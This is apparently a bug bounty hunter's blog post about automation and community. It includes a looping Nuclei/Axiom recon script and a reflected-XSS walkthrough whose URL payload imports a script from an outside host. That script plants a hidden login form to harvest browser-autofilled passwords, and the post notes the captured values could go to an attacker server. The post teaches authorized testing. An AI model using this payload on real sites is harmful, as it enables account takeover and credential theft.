My name is Tess. I began my bug bounty career at the age of 17 while working at a phone repair store in New York City. Although the job didn’t hold my interest for long, it sparked a deep curiosity for breaking and tinkering with devices. My fascination grew, and by the age of 24, I had transformed myself into a full-time ethical hacker. This transition gave me financial, career, and location independence—a freedom I never imagined.

That being said, my path to success wasn’t straightforward. When I started in 2018, I struggled to find any bugs at all, primarily because I relied on Twitter as my only resource. I realized that I needed a more focused approach so I began to target specific systems, study Hacktivity write-ups, and practice consistently with PortSwigger labs. After months of refining my skills, I started to find vulnerabilities. 

In 2022, I was awarded Most Valuable Hacker by Bugcrowd, and recognized for my achievements in technical severity, accuracy, and the sheer volume of valid submissions. But it wasn’t just my work that got me there—collaboration played a critical role.

In this LevelUp blog, I’m sharing my experience leveraging automation and collaborating with the hacker community as a way to build success in bug hunting. 

Automating workflows

One of the key components in my workflow is automation. In fact, 60% of my workflow is automated using custom scripts that continuously scan for bugs across public engagements. But automation isn’t just about running scripts—it’s about running them smartly. For example, combining Nuclei with Axiom has led to significant results for me.

Below is a sample bash script I frequently use to automate scanning across my favorite targets. It leverages Nuclei, Axiom, and Notify to streamline the process:

This script runs on autopilot, monitoring targets continuously and sending notifications whenever vulnerabilities are found.

#!/bin/bash

while true; do
echo "Running axiom-fleet..." | notify
axiom-fleet --instances 30 -silent

echo "Running axiom-scan for subdomain enumeration now..." | notify
axiom-scan subdomains.txt -m subfinder -all -o subs.txt
echo "axiom-scan for subdomain enumeration completed." | notify

echo "Running axiom-scan for HTTPx probing..." | notify

axiom-scan subs.txt -m httpx -o resolved.txt

echo "axiom-scan for HTTP probing completed..." | notify

echo "Running nuclei scans..." | notify
axiom-scan resolved.txt -m nuclei --severity medium,high,critical -o hits.txt --rm-when-done

echo "Nuclei scan completed now, deleted all the axiom spins too." | notify

echo "Reading the hits now..." | notify
cat hits.txt | egrep critical | notify

echo "Reading the hits now..." | notify
cat hits.txt | egrep high | notify

echo "Reading the hits now..." | notify
cat hits.txt | egrep medium | notify

echo "Going into sleep mode now, see you in ETA 30h" | notify

sleep 216000 # 60 hours in seconds
done

Chaining XSS to Single Click Account Takeovers (ATOs)

I recently shared a Browser-Based Password Manager exploit on X (formerly Twitter). My handle is:@ArmanSameer95. This exploit demonstrates how to maximize the value of Reflected XSS bugs.

Here’s a quick walkthrough:

Let’s say you find a Reflected XSS vulnerability on https://tess.acme.com?id="><script>alert(1)</script>. Instead of simply reporting it, you can chain it into a more meaningful attack—an Account Takeover using a Browser-Based Password Manager exploit.

Rather than triggering alert(1), import your malicious script:

https://tess.acme.com?id=asdf</a><img src onerror=import("https://v.tess.com/tess.js")>

This payload exploits the browser’s saved passwords for *.acme.com, allowing you to steal credentials via the Reflected XSS vulnerability. In most programs, this could qualify as a high (P2) or medium (P3) severity issue.

 

document.body.innerHTML = "";
var scriptss = document.scripts;

for (var i = scriptss.length - 1; i >= 0; i--) {
var script = scriptss[i];
script.parentNode.removeChild(script);
}

var s = document.createElement('style');
var c = 'body > *:not(form):not(textarea) { display: none !important; }';
s.appendChild(document.createTextNode(c));
document.head.appendChild(s);

var form = document.createElement('form');

var inputName = document.createElement('input');
inputName.type = 'text';
inputName.id = 'username';
inputName.name = 'username';
inputName.autocomplete = 'username';
inputName.placeholder = 'Check here';
inputName.style.border = "none";
inputName.style.outline = "none";
inputName.style.background = "none";
inputName.style.width = "100%";
inputName.classList.add("single-input")

var inputPassword = document.createElement('input');
inputPassword.type = 'password';
inputPassword.id = 'password';
inputPassword.name = 'password';
inputPassword.autocomplete = 'current-password';
inputPassword.style.border = "none";
inputPassword.style.outline = "none";
inputPassword.style.background = "none";
inputPassword.style.padding = "0";
inputPassword.style.width = "1%";
inputPassword.classList.add("single-input")

form.appendChild(inputName);
form.appendChild(inputPassword);

document.body.appendChild(form);

// Assuming you have an <input> element with an ID of "myInput"
var inputElement = document.getElementById("username");

setTimeout(function () {
let a = document.getElementsByName('username')[0];
let b = document.getElementsByName('password')[0];
function f() {
if(b.value.length>0) {
alert(`Here is user credentials that can be forwarded into attacker server ( I implemented the poc in this way to prevent your credentials from being redirected to my website ) : ${(a.value)} , Password = ${(b.value)}`);
}
}
a.form.onclick=f;
a.onchange=f;
b.onchange=f;
a.oninput=f;
b.oninput=f;
}, 1000);

Collaboration: The role of friendship and community

I promise, all of this ties back into collaboration. Stay with me. 

While I am able to automate workflows, scan targets, and chain exploits like XSS into account takeovers, I know that collaboration is the most important piece of my success and I wouldn’t be here without the help of my community. For instance, when I can’t escalate server-side issues, I run to friends like Bsysop, Sw33tlie, and Restricted for help. Meanwhile, El Mahdi collaborates with me on client-side exploits and research, and Todayisnew works with me on new scanning methods. Together, they form a creative, problem-solving powerhouse that I’m lucky enough to have access to. 

Throughout my journey, I connected with fellow hackers who shared ideas, solved problems together, and we constantly challenged each other to improve. I’d like to thank the previously listed long-time friends along with Hx01 and Orwagodfather for helping me achieve success and helping me learn. Check out the Collaboration Crusader leaderboard here.

On days when bugs are hard to find or motivation is low, having a network of friends to lean on and share ideas with can make all the difference. I highly encourage you to reach out to other hackers, join groups, and attend events. When you get stuck, ask for help and always offer help to others when you can. Building a supportive community comes faster than you think. One minute you’re turning to forums for guidance, hoping there’s an answer to your unique issue. Next, you’re at a live hacking event with your friends, presenting your findings.